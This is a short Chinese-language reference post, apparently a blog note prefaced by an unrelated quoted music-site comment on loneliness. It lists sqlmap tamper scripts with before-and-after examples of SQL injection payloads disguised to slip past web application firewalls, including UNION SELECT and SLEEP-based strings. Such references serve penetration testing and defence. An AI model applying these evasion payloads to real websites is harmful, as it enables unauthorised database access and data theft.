孤独是什么,洗了个头,吹了个好看的发型,换了双干净的鞋子,穿了件帅气的衣服,去超市买了一包烟和一瓶水然后就回家了。。。
---- 网易云热评
一、支持所有的数据库
1、apostrophemask.py
作用:用utf8代替引号
("1 AND '1'='1")替换后'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
2、base64encode.py
作用:用base64编码替换
("1' AND SLEEP(5)#")替换后'MScgQU5EIFNMRUVQKDUpIw=='
3、multiplespaces.py
作用:围绕SQL关键字添加多个空格
('1 UNION SELECT foobar')替换后'1 UNION SELECT foobar'
4、space2plus.py
作用:用+替换空格
('SELECT id FROM users')替换后'SELECT+id+FROM+users'
5、nonrecursivereplacement.py
作用:双重查询语句
('1 UNION SELECT 2--')替换后'1 UNIOUNIONN SELESELECTCT 2--'
6、space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
('SELECT id FROM users')替换后'SELECT%0Did%0DFROM%0Ausers'
7、unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
('-1 UNION ALL SELECT')替换后'-1 UNION SELECT'
8、securesphere.py
作用:追加特制的字符串
('1 AND 1=1')替换后"1 AND 1=1 and '0having'='0having'"
二、MSSQL数据库
1、space2hash.py
作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
'1 AND 9227=9227'替换后'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
2、equaltolike.py
作用:like 代替等号
SELECT * FROM users WHERE id=1替换后SELECT * FROM users WHERE id LIKE 1
3、space2mssqlblank.py(mssql)
作用:空格替换为其它空符号
SELECT id FROM users替换后SELECT%08id%02FROM%0Fusers
4、space2mssqlhash.py
作用:替换空格
('1 AND 9227=9227')替换后'1%23%0AAND%23%0A9227=9227'